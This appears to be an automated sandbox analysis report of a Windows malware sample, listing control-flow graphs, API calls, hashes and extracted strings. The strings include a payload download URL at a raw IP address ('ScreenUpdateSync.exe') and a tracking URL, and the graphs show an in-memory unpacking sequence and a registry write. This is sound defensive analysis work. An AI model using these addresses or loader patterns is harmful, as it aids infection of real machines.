                                                                                                                                                                                                                                        control_flow_graph 74 43d03c-43d06c call 43cd9f 77 43d087-43d093 call 43977e 74->77 78 43d06e-43d079 call 42eab6 74->78 83 43d095-43d0aa call 42eab6 call 42eac9 77->83 84 43d0ac-43d0f5 call 43cd0a 77->84 85 43d07b-43d082 call 42eac9 78->85 83->85 94 43d162-43d16b GetFileType 84->94 95 43d0f7-43d100 84->95 92 43d35e-43d364 85->92 96 43d1b4-43d1b7 94->96 97 43d16d-43d19e GetLastError call 42ea93 CloseHandle 94->97 99 43d102-43d106 95->99 100 43d137-43d15d GetLastError call 42ea93 95->100 103 43d1c0-43d1c6 96->103 104 43d1b9-43d1be 96->104 97->85 113 43d1a4-43d1af call 42eac9 97->113 99->100 105 43d108-43d135 call 43cd0a 99->105 100->85 108 43d1ca-43d218 call 4396c7 103->108 109 43d1c8 103->109 104->108 105->94 105->100 116 43d21a-43d226 call 43cf1b 108->116 117 43d228-43d24c call 43cabd 108->117 109->108 113->85 116->117 123 43d250-43d25a call 4335cd 116->123 124 43d25f-43d2a2 117->124 125 43d24e 117->125 123->92 127 43d2c3-43d2d1 124->127 128 43d2a4-43d2a8 124->128 125->123 129 43d2d7-43d2db 127->129 130 43d35c 127->130 128->127 132 43d2aa-43d2be 128->132 129->130 133 43d2dd-43d310 CloseHandle call 43cd0a 129->133 130->92 132->127 136 43d312-43d33e GetLastError call 42ea93 call 439890 133->136 137 43d344-43d358 133->137 136->137 137->130
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0043CD0A: CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27
                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0043D150
                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 0043D157
                                                                                                                                                                                                                                        • GetFileType.KERNEL32(00000000), ref: 0043D163
                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0043D16D
                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 0043D176
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0043D196
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0043D2E0
                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0043D312
                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 0043D319
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                        • String ID: H
                                                                                                                                                                                                                                        • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                        • Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                                                                                                                                                                                        • Instruction ID: 375b4e16163f674ce9da34a4ad13212d62ba31a6b33a52f993f1a67b08af40b6
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ACA13632E101149FCF19AF68EC517AE7BA1AF0A324F14115EF8159B391D6389D02CB5A

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 142 432f29-432f39 143 432f53-432f55 142->143 144 432f3b-432f4e call 42eab6 call 42eac9 142->144 145 432f5b-432f61 143->145 146 4332bd-4332ca call 42eab6 call 42eac9 143->146 158 4332d5 144->158 145->146 148 432f67-432f92 145->148 163 4332d0 call 42a59d 146->163 148->146 152 432f98-432fa1 148->152 156 432fa3-432fb6 call 42eab6 call 42eac9 152->156 157 432fbb-432fbd 152->157 156->163 161 432fc3-432fc7 157->161 162 4332b9-4332bb 157->162 164 4332d8-4332dd 158->164 161->162 166 432fcd-432fd1 161->166 162->164 163->158 166->156 169 432fd3-432fea 166->169 171 433007-433010 169->171 172 432fec-432fef 169->172 173 433012-433029 call 42eab6 call 42eac9 call 42a59d 171->173 174 43302e-433038 171->174 175 432ff1-432ff7 172->175 176 432ff9-433002 172->176 207 4331f0 173->207 179 43303a-43303c 174->179 180 43303f-43305d call 4336a7 call 43346a * 2 174->180 175->173 175->176 177 4330a3-4330bd 176->177 182 4330c3-4330d3 177->182 183 433191-43319a call 43d365 177->183 179->180 211 43307a-4330a0 call 4347ee 180->211 212 43305f-433075 call 42eac9 call 42eab6 180->212 182->183 187 4330d9-4330db 182->187 194 43320d 183->194 195 43319c-4331ae 183->195 187->183 191 4330e1-433107 187->191 191->183 196 43310d-433120 191->196 199 433211-433229 ReadFile 194->199 195->194 201 4331b0-4331bf GetConsoleMode 195->201 196->183 202 433122-433124 196->202 205 433285-433290 GetLastError 199->205 206 43322b-433231 199->206 201->194 208 4331c1-4331c5 201->208 202->183 203 433126-433151 202->203 203->183 210 433153-433166 203->210 213 433292-4332a4 call 42eac9 call 42eab6 205->213 214 4332a9-4332ac 205->214 206->205 215 433233 206->215 209 4331f3-4331fd call 43346a 207->209 208->199 216 4331c7-4331e1 ReadConsoleW 208->216 209->164 210->183 218 433168-43316a 210->218 211->177 212->207 213->207 225 4332b2-4332b4 214->225 226 4331e9-4331ef call 42ea93 214->226 222 433236-433248 215->222 223 4331e3 GetLastError 216->223 224 433202-43320b 216->224 218->183 228 43316c-43318c 218->228 222->209 232 43324a-43324e 222->232 223->226 224->222 225->209 226->207 228->183 236 433250-433260 call 432c45 232->236 237 433267-433272 232->237 249 433263-433265 236->249 242 433274 call 432d95 237->242 243 43327e-433283 call 432a85 237->243 247 433279-43327c 242->247 243->247 247->249 249->209
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                                                                                                                                                                                        • Instruction ID: e6f917e7e92ba8bfc6e6230e9bcbcb6957f35208d34794f9861c257e27c575d5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 44C11670E04345AFDF11DFAAD841BAEBBB0BF0D305F14119AE815A7392C7389A41CB69

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 250 212003c-2120047 251 2120049 250->251 252 212004c-2120263 call 2120a3f call 2120e0f call 2120d90 VirtualAlloc 250->252 251->252 267 2120265-2120289 call 2120a69 252->267 268 212028b-2120292 252->268 273 21202ce-21203c2 VirtualProtect call 2120cce call 2120ce7 267->273 270 21202a1-21202b0 268->270 272 21202b2-21202cc 270->272 270->273 272->270 279 21203d1-21203e0 273->279 280 21203e2-2120437 call 2120ce7 279->280 281 2120439-21204b8 VirtualFree 279->281 280->279 283 21205f4-21205fe 281->283 284 21204be-21204cd 281->284 287 2120604-212060d 283->287 288 212077f-2120789 283->288 286 21204d3-21204dd 284->286 286->283 292 21204e3-2120505 LoadLibraryA 286->292 287->288 293 2120613-2120637 287->293 290 21207a6-21207b0 288->290 291 212078b-21207a3 288->291 294 21207b6-21207cb 290->294 295 212086e-21208be LoadLibraryA 290->295 291->290 296 2120517-2120520 292->296 297 2120507-2120515 292->297 298 212063e-2120648 293->298 299 21207d2-21207d5 294->299 302 21208c7-21208f9 295->302 300 2120526-2120547 296->300 297->300 298->288 301 212064e-212065a 298->301 303 21207d7-21207e0 299->303 304 2120824-2120833 299->304 305 212054d-2120550 300->305 301->288 306 2120660-212066a 301->306 307 2120902-212091d 302->307 308 21208fb-2120901 302->308 309 21207e2 303->309 310 21207e4-2120822 303->310 314 2120839-212083c 304->314 311 21205e0-21205ef 305->311 312 2120556-212056b 305->312 313 212067a-2120689 306->313 308->307 309->304 310->299 311->286 315 212056f-212057a 312->315 316 212056d 312->316 317 2120750-212077a 313->317 318 212068f-21206b2 313->318 314->295 319 212083e-2120847 314->319 325 212059b-21205bb 315->325 326 212057c-2120599 315->326 316->311 317->298 320 21206b4-21206ed 318->320 321 21206ef-21206fc 318->321 322 212084b-212086c 319->322 323 2120849 319->323 320->321 327 212074b 321->327 328 21206fe-2120748 321->328 322->314 323->295 333 21205bd-21205db 325->333 326->333 327->313 328->327 333->305
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0212024D
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                        • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                        • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                        • Instruction ID: 6307871ac7b424446d8f48e480cf3fe90682051c211dfdc8c527356dcb06ef3a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 61526A74A01229DFDB64CF58C984BACBBB1BF09304F1581D9E54DAB351DB30AA99CF14

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C27
                                                                                                                                                                                                                                          • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                                                                                                                                                                                          • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                                                                                                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E3A
                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00402E4B
                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00402E4E
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Internet$CloseHandleOpen_wcslen
                                                                                                                                                                                                                                        • String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
                                                                                                                                                                                                                                        • API String ID: 3067768807-1501832161
                                                                                                                                                                                                                                        • Opcode ID: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
                                                                                                                                                                                                                                        • Instruction ID: 610146e9b537463af15e95cb977131b409bd75c1d6f6ac837d2bfbf99fd09ca4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 95515295E65344A9E320EFB0BC46B762378EF58712F10643BE518CB2F2E7B09944875E

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1687354797-0
                                                                                                                                                                                                                                        • Opcode ID: 42908ff57393ecb554ca568fc12e9326ff4705fd749688a3b6bbc729bace43dc
                                                                                                                                                                                                                                        • Instruction ID: 19e1887bebf86d68050debe7f629b0077f83fb22891cd3fd40adaf63da529dec
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 42908ff57393ecb554ca568fc12e9326ff4705fd749688a3b6bbc729bace43dc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2214F72C042089ADF15EBE9D845BDEB7F8AF08318F14407FE544B72C2DB7C99448AA9

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::_Cnd_initX.LIBCPMT ref: 0040581C
                                                                                                                                                                                                                                        • __Cnd_signal.LIBCPMT ref: 00405828
                                                                                                                                                                                                                                        • std::_Cnd_initX.LIBCPMT ref: 0040583D
                                                                                                                                                                                                                                        • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405844
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2059591211-0
                                                                                                                                                                                                                                        • Opcode ID: df7099e6b6e7795d0fbd5e9afe4ff51e43c99f0fb0ace34248401a5e00c0a4af
                                                                                                                                                                                                                                        • Instruction ID: 35483bd65d518524af9bc0c336ffe1903f30c86e9e3fc9c48514fd729a934722
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: df7099e6b6e7795d0fbd5e9afe4ff51e43c99f0fb0ace34248401a5e00c0a4af
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6BF082324007009BE7317762C807B1A77A0AF0031DF10883FF496B69E2CFBDA8544A9D

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                                                                                                                                                                                                        • ExitThread.KERNEL32 ref: 0042DFDA
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorExitLastThread
                                                                                                                                                                                                                                        • String ID: F(@
                                                                                                                                                                                                                                        • API String ID: 1611280651-2698495834
                                                                                                                                                                                                                                        • Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                                                                                                                                                                                                        • Instruction ID: 20c869b795d3320417ca4c19bdea27327a86df913c4cc91a2df8cdb03a1abfe5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E7F0C274A00614AFDB14AFB2E80ABAE3B70FF09715F10056EF4015B392CB796A55DB6C

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 435 42e114-42e11f 436 42e121-42e133 call 42eac9 call 42a59d 435->436 437 42e135-42e148 call 42e0cb 435->437 452 42e185-42e188 436->452 443 42e176 437->443 444 42e14a-42e167 CreateThread 437->444 448 42e178-42e184 call 42e03d 443->448 446 42e189-42e18e 444->446 447 42e169-42e175 GetLastError call 42ea93 444->447 450 42e190-42e193 446->450 451 42e195-42e197 446->451 447->443 448->452 450->451 451->448
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateThread.KERNEL32(?,?,Function_0002DFC0,00000000,?,?), ref: 0042E15D
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,0040CF0E,00000000,00000000,?,?,00000000,?), ref: 0042E169
                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 0042E170
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2744730728-0
                                                                                                                                                                                                                                        • Opcode ID: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
                                                                                                                                                                                                                                        • Instruction ID: dd8ab9647f30f5a835e394039e4629bb1c045fd9997365d20d72d2d3bd3a9304
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D601D236200239BBDB159FA3EC059AF7B6AEF81720F40003AF90587210DB358922C7A8

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 456 434755-43476d call 439921 459 434780-434796 SetFilePointerEx 456->459 460 43476f-434774 call 42eac9 456->460 462 4347a7-4347b1 459->462 463 434798-4347a5 GetLastError call 42ea93 459->463 465 43477a-43477e 460->465 464 4347b3-4347c8 462->464 462->465 463->465 469 4347cd-4347d2 464->469 465->469
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • SetFilePointerEx.KERNEL32(00000000,00000000,0040DDD5,00000000,00000002,0040DDD5,00000000,?,?,?,00434804,00000000,00000000,0040DDD5,00000002), ref: 0043478E
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00434804,00000000,00000000,0040DDD5,00000002,?,0042C161,?,00000000,00000000,00000001,?,0040DDD5,?,0042C216), ref: 00434798
                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 0043479F
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2336955059-0
                                                                                                                                                                                                                                        • Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                                                                                                                                                                                                        • Instruction ID: bcc915797d3e420762720933ca2114d92cc1cd6946a03aaf12616f5971efc3d8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 01016836710114ABCB148FAADC059EE7B29EFCA730F24020AF81487290EB35ED118B98

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 470 402bad-402bd9 RegCreateKeyExW 471 402bdb-402bed RegSetValueExW 470->471 472 402bef-402bf2 470->472 471->472 473 402bf4-402bf7 RegCloseKey 472->473 474 402bfd-402c03 472->474 473->474
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BCF
                                                                                                                                                                                                                                        • RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BE7
                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BF7
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CloseCreateValue
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1818849710-0
                                                                                                                                                                                                                                        • Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                                                                                                                                                                                        • Instruction ID: 415a99b38b1cf926e07f2752f011508d1a06d6109c2dcef31e57e84081a4d25d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ABF0B4B650011CFFEB214F94DD89DBBBA7CEB007E9F100175FA01B2150D6B19E009664

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 475 42e074-42e081 call 431f5e 478 42e083-42e086 ExitThread 475->478 479 42e08c-42e094 475->479 479->478 480 42e096-42e09a 479->480 481 42e0a1-42e0a7 480->481 482 42e09c call 4354f6 480->482 484 42e0b4-42e0ba 481->484 485 42e0a9-42e0ab 481->485 482->481 484->478 487 42e0bc-42e0be 484->487 485->484 486 42e0ad-42e0ae CloseHandle 485->486 486->484 487->478 488 42e0c0-42e0ca FreeLibraryAndExitThread 487->488
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00431F5E: GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
                                                                                                                                                                                                                                          • Part of subcall function 00431F5E: _free.LIBCMT ref: 00431F98
                                                                                                                                                                                                                                          • Part of subcall function 00431F5E: SetLastError.KERNEL32(00000000), ref: 00431FCC
                                                                                                                                                                                                                                        • ExitThread.KERNEL32 ref: 0042E086
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0AE
                                                                                                                                                                                                                                        • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0C4
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1198197534-0
                                                                                                                                                                                                                                        • Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                                                                                                                                                                                        • Instruction ID: 941e5d7bb2069d1fb9760ffb86e13a1db41397deee20687f00b4917166382ed0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1BF054302006347BD735AF27E808A5B7A986F41775F584715FC25C22A1D768DD838659

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 489 40239e-4023ac 490 402561-402563 PostQuitMessage 489->490 491 4023b2-4023b7 489->491 492 402569-40256e 490->492 493 4023d0-4023d7 491->493 494 4023b9-4023cb DefWindowProcW 491->494 495 4023d9 call 401da4 493->495 496 4023de-4023e5 493->496 494->492 495->496 496->492 498 4023eb-40255f call 4010ba call 4029f4 496->498 498->492
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 004023C5
                                                                                                                                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00402563
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: MessagePostProcQuitWindow
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3873111417-0
                                                                                                                                                                                                                                        • Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                                                                                                                                                        • Instruction ID: 43c76da2243f772c6aced19a3fe0e8e69066b3bbdff08d4cabba9d560eb75400
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 02412E25A64340A5E730EFA5BD55B2633B0FF64722F10252BE528DB2B2E3B28540C35E

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 503 40155a-4016d0 Sleep call 4010ba 505 4016d5-4016d9 503->505
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNEL32(00001D1B), ref: 00401562
                                                                                                                                                                                                                                          • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                                                                                                                                                                                          • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _wcslen$Sleep
                                                                                                                                                                                                                                        • String ID: http://176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                                        • API String ID: 3358372957-3120454669
                                                                                                                                                                                                                                        • Opcode ID: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
                                                                                                                                                                                                                                        • Instruction ID: 033e26d6726dec48d9da5d172e0a3ce7e355aee553d479aaec466036f4edd3d7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 83319A15A6538094E330CFA0BC95A662330FF64B52F50653BD60CCB2B2E7A18587C35E
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0040298F
